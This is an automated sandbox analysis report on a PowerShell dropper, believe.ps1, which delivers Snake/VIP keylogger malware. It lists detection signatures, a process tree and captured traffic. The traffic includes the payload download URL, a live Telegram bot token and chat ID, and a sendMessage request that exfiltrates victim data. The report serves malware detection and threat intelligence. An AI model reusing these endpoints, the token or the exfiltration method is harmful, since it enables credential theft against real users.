Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
believe.ps1

Overview

General Information

Sample name:believe.ps1
Analysis ID:1638285
MD5:aeb93759c04d569f52546d72ed703596
SHA1:73665fa6587a138945e12c48b3c683ce91c27490
SHA256:f7325182772f91e4293f2751dedef7930430cb91e357f2d643d2dc615816b335
Tags:ps1user-TornadoAV_dev
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Powershell drops PE file
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6636 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • x.exe (PID: 4292 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FC2AA7BEED400468B816DB83CF00815D)
      • x.exe (PID: 5156 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: FC2AA7BEED400468B816DB83CF00815D)
  • notepad.exe (PID: 668 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\believe.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat id": "6163418482"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat_id": "6163418482", "Version": "4.4"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    dump.pcapWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x356d4:$a1: get_encryptedPassword
    • 0x359fd:$a2: get_encryptedUsername
    • 0x35406:$a3: get_timePasswordChanged
    • 0x3550f:$a4: get_passwordField
    • 0x356ea:$a5: set_encryptedPassword
    • 0x36f7c:$a7: get_logins
    • 0x36edf:$a10: KeyLoggerEventArgs
    • 0x36b44:$a11: KeyLoggerEventArgsEventHandler

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x1e112:$a1: get_encryptedPassword
          • 0x1e43b:$a2: get_encryptedUsername
          • 0x1df22:$a3: get_timePasswordChanged
          • 0x1e02b:$a4: get_passwordField
          • 0x1e128:$a5: set_encryptedPassword
          • 0x1f80a:$a7: get_logins
          • 0x1f76d:$a10: KeyLoggerEventArgs
          • 0x1f3d2:$a11: KeyLoggerEventArgsEventHandler
          00000004.00000002.1321698645.0000000003287000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.x.exe.328c714.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              4.2.x.exe.3287ec1.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                4.2.x.exe.3287ec1.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  4.2.x.exe.328c714.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    5.2.x.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 17 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", ProcessId: 6636, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\believe.ps1", ProcessId: 6636, ProcessName: powershell.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-14T11:00:02.564605+010028033053Unknown Traffic192.168.2.1249692104.21.64.1443TCP
                      2025-03-14T11:00:11.779493+010028033053Unknown Traffic192.168.2.1249695104.21.64.1443TCP
                      2025-03-14T11:00:20.152461+010028033053Unknown Traffic192.168.2.1249703104.21.64.1443TCP
                      2025-03-14T11:00:26.323535+010028033053Unknown Traffic192.168.2.1262154104.21.64.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-14T10:59:59.451659+010028032742Potentially Bad Traffic192.168.2.1249690158.101.44.24280TCP
                      2025-03-14T11:00:01.951652+010028032742Potentially Bad Traffic192.168.2.1249690158.101.44.24280TCP
                      2025-03-14T11:00:11.170526+010028032742Potentially Bad Traffic192.168.2.1249693158.101.44.24280TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-14T11:00:28.825751+010018100071Potentially Bad Traffic192.168.2.1262172149.154.167.220443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://176.65.144.3/dev/believe.exeAvira URL Cloud: Label: malware
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dllAvira: detection malicious, Label: TR/Injector.vqojt
                      Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Injector.vqojt
                      Found malware configuration
                      Source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat id": "6163418482"}
                      Source: 00000004.00000002.1322785620.0000000004A09000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o", "Chat_id": "6163418482", "Version": "4.4"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\RUNPEE.dllReversingLabs: Detection: 79%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 66%
                      Multi AV Scanner detection for submitted file
                      Source: believe.ps1Virustotal: Detection: 29%Perma Link
                      Source: believe.ps1ReversingLabs: Detection: 31%
                      Joe Sandbox ML detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                      Sample uses string decryption to hide its real strings
                      Source: 4.2.x.exe.4a696b8.3.unpackString decryptor: 7692968455:AAFUd6DDUCm9bBSVBpp5I0Oudm0YDdn6C3o
                      Source: 4.2.x.exe.4a696b8.3.unpackString decryptor: 6163418482
                      Source: 4.2.x.exe.4a696b8.3.unpackString decryptor:

                      Location Tracking

                      barindex
                      Tries to detect the country of the analysis system (by using the IP)
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49691 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:62172 version: TLS 1.2
                      Source: Binary string: CZG3HF22.pdbH source: x.exe, 00000004.00000000.1301812032.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                      Source: Binary string: CZG3HF22.pdb source: x.exe, 00000004.00000000.1301812032.0000000000F12000.00000002.00000001.01000000.0000000A.sdmp, x.exe.0.dr
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 018847D7h4_2_01884688
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 0188482Ch4_2_01884688
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00BEF45Dh5_2_00BEF2C4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00BEF45Dh5_2_00BEF4AC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00BEF45Dh5_2_00BEF52F
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then jmp 00BEFC19h5_2_00BEF974

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.12:62172 -> 149.154.167.220:443
                      Uses the Telegram API (likely for C&C communication)
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficTCP traffic: 192.168.2.12:62148 -> 1.1.1.1:53
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Mar 2025 09:59:57 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Mon, 17 Feb 2025 11:23:00 GMTETag: "43600-62e54bf3d7570"Accept-Ranges: bytesContent-Length: 275968Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 68 ba 8e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 04 00 00 14 00 00 00 00 00 00 7e 3e 04 00 00 20 00 00 00 40 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 3e 04 00 4b 00 00 00 00 40 04 00 17 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 1e 04 00 00 20 00 00 00 20 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 10 00 00 00 40 04 00 00 12 00 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 04 00 00 02 00 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 3e 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 9e 02 00 a4 9f 01 00 03 00 00 00 ab 00 00 06 d4 9d 02 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 7d fc 0f 8e b3 e8 69 73 af ff 00 00 00 00 00 00 01 02 03 04 06 08 08 00 00 00 00 00 00 00 00 7e 00 00 00 46 00 00 00 40 00 00 00 37 00 00 00 25 00 00 00 6d 00 00 00 24 00 00 00 7e 00 00 00 7e 00 00 00 64 00 00 00 72 00 00 00 61 00 00 00 47 00 00 00 6f 00 00 00 6e 00 00 00 7e 00 00 00 1e 02 28 20 00 00 0a 2a 26 00 02 28 21 00 00 0a 00 2a ce 73 22 00 00 0a 80 01 00 00 04 73 23 00 00 0a 80 02 00 00 04 73 24 00 00 0a 80 03 00 00 04 73 25 00 00 0a 80 04 00 00 04 73 26 00 00 0a 80 05 00 00 04 2a 5a 00 03 fe 16 06 00 00 1b 6f 39 00 00 0a 00 03 fe 15 06 00 00 1b 2a 26 00 02 28 3a 00 00 0a 00 2a 26 00 03 fe 15 06 00 00 1b 2a 22 00 02 80 09 00 00 04 2a 56 73 1d 00 00 06 28 43 00 00 0a 74 09 00 00 02 80 0a 00 00 04 2a 1e 02 28 44 00 00 0a 2a 22 7e 0b 00 00 04 2b 00 2a 22 7e 0c 00 00 04 2b 00 2a 22 7e 0d 00 00 04 2b 00 2a 1e 02 80 0d 00 00 04 2a 22 7e 0e 00 00 04 2b 00 2a 22 7e 0f 00
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:721680%0D%0ADate%20and%20Time:%2015/03/2025%20/%2016:17:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20721680%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dev/believe.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 176.65.144.3 176.65.144.3
                      Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                      Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: checkip.dyndns.org
                      Source: unknownDNS query: name: reallyfreegeoip.org
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49693 -> 158.101.44.242:80
                      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49690 -> 158.101.44.242:80
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49695 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49703 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:49692 -> 104.21.64.1:443
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.12:62154 -> 104.21.64.1:443
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.12:49691 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:721680%0D%0ADate%20and%20Time:%2015/03/2025%20/%2016:17:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20721680%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dev/believe.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
